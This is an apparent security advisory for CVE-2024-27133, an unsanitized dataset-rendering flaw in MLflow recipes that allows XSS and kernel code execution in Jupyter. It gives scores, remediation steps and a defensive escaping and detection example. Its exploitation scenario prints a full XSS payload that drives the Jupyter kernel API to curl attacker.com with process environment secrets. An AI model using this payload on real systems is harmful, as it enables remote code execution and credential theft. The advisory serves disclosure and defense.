CVE-2024-27133: MLflow: XSS in recipe runner enables Jupyter RCE

Severity: CRITICAL | PoC available | CISA SSVC: Track*
Published February 23, 2024
CISO Take

MLflow's recipe pipeline renders dataset table fields without sanitization, allowing a crafted dataset to execute JavaScript in Jupyter Notebook and escalate to full RCE on the data scientist's machine. Any team running MLflow recipes against external or third-party datasets is at risk — no credentials required from the attacker. Patch immediately via MLflow PR #10893 and audit all active recipe data source configurations.

Risk Assessment

CVSS 9.6 Critical with no authentication required and low attack complexity makes this trivially exploitable at scale. The 'Changed Scope' vector (S:C) accurately reflects how the XSS breaks out of the MLflow rendering context into Jupyter's kernel execution environment, achieving full C/I/A impact. Exposure is highest in organizations where data scientists run MLflow locally or in shared Jupyter environments with access to cloud credentials and model artifacts. No patch was available at time of publication — assess exposure now.

Affected Systems

Package: mlflow
Ecosystem: pip
Patched: No patch

Severity & Risk

CVSS 3.1: 9.6 / 10
EPSS: 0.2% chance of exploitation in 30 days (higher than 42% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): Required
S (Scope): Changed
C (Confidentiality): High
I (Integrity): High
A (Availability): High

Recommended Action

1. PATCH: Apply MLflow fix from PR #10893 immediately. Pin to a patched version and block older versions via package policy.

2. DATA SOURCE CONTROLS: Enforce policies requiring only trusted, schema-validated datasets in MLflow recipes. Treat all external datasets as untrusted inputs.

3. JUPYTER HARDENING: Run Jupyter with Content-Security-Policy headers; consider JupyterHub with isolated kernels per user and no shared kernel access.

4. NETWORK SEGMENTATION: Data science environments should not have broad lateral access to production systems or credential stores.

5. DETECTION: Monitor Jupyter kernel execution for unusual outbound network connections or subprocess spawning following dataset load events. Audit kernel execution logs.

6. CREDENTIALS: Rotate credentials accessible from data science workstations as a precaution if the exposure window was open.

CISA SSVC Assessment

Decision: Track*
Exploitation: poc
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.6.2 - Data for AI systems; A.9.3 - Information security for AI systems
NIST AI RMF: GOVERN 1.7 - Organizational processes to address AI risks; MANAGE 3.2 - Risk treatment in AI development environments
OWASP LLM Top 10: LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

Is CVE-2024-27133 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-27133, increasing the risk of exploitation.

What systems are affected by CVE-2024-27133?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, ML experiment tracking, data science notebooks, MLOps platforms.

What is the CVSS score for CVE-2024-27133?

CVE-2024-27133 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.20%.

Technical Details

NVD Description

Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset. This issue leads to a client-side RCE when running the recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over dataset table fields.

Exploitation Scenario

An adversary with the ability to influence a dataset — via a compromised data pipeline, a malicious public dataset, or a supply chain attack on a data vendor — injects an XSS payload into a column header or cell value, for example:

<img src=x onerror="fetch('/api/kernels/KERNEL_ID/execute',{method:'POST',body:JSON.stringify({code:'import subprocess;subprocess.run(["curl","https://attacker.com/exfil?h="+open("/proc/1/environ").read()])'})})">

When a data scientist runs an MLflow recipe referencing this dataset inside Jupyter Notebook, MLflow renders the dataset table without HTML encoding. The payload executes in the notebook's browser context (same origin as the Jupyter server), calls the Jupyter REST kernel API, and injects arbitrary Python code into the running kernel. The attacker achieves silent RCE on the data scientist's machine with no visible indicators, gaining access to ML model weights, training data, and cloud provider credentials stored in environment variables.
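Added example (not MLflow's own code) that illustrates the defect described above and the fix behind steps 1 and 2: a table renderer in its vulnerable form beside an HTML-escaping form, plus a pre-load check that flags markup-like header or cell values so an untrusted dataset can be rejected before a recipe runs. The dataset, column names and payload strings are constructed for the example; plain lists stand in for a DataFrame so it runs offline.

```python
import html
import re

# Constructed sample dataset: the second column header carries a benign
# HTML/JS fragment, and one cell carries a script tag.
COLUMNS = ["id", '<img src=x onerror="alert(1)">']
ROWS = [[1, "normal value"], [2, "<script>evil()</script>"]]


def render_table_unsafe(columns, rows):
    """Interpolates headers and cells straight into HTML (the vulnerable pattern)."""
    head = "".join(f"<th>{c}</th>" for c in columns)
    body = "".join(
        "<tr>" + "".join(f"<td>{v}</td>" for v in r) + "</tr>" for r in rows
    )
    return f"<table><thead><tr>{head}</tr></thead><tbody>{body}</tbody></table>"


def render_table_safe(columns, rows):
    """Same output shape, but every header and cell is HTML-escaped first."""
    def esc(value):
        # quote=True also escapes " and ', so attribute-context injection fails too
        return html.escape(str(value), quote=True)
    head = "".join(f"<th>{esc(c)}</th>" for c in columns)
    body = "".join(
        "<tr>" + "".join(f"<td>{esc(v)}</td>" for v in r) + "</tr>" for r in rows
    )
    return f"<table><thead><tr>{head}</tr></thead><tbody>{body}</tbody></table>"


# Data source control: flag anything that looks like a tag, an inline event
# handler, or a javascript: URL so the dataset can be quarantined before use.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def find_markup_fields(columns, rows):
    """Returns (location, value) pairs for every suspicious header or cell."""
    hits = [("header", c) for c in columns if MARKUP_RE.search(str(c))]
    for i, r in enumerate(rows):
        hits += [(f"row {i}", v) for v in r if MARKUP_RE.search(str(v))]
    return hits


if __name__ == "__main__":
    print("unsafe output contains raw <img:", "<img" in render_table_unsafe(COLUMNS, ROWS))
    print("safe output contains raw <img:", "<img" in render_table_safe(COLUMNS, ROWS))
    for where, value in find_markup_fields(COLUMNS, ROWS):
        print(f"flagged {where}: {value!r}")
```

Escaping at render time is the fix for the renderer; the pre-load check is a separate control for teams that cannot yet patch and want to reject suspicious external datasets up front.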

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Timeline

Published: February 23, 2024
Last Modified: January 22, 2025
First Seen: February 23, 2024
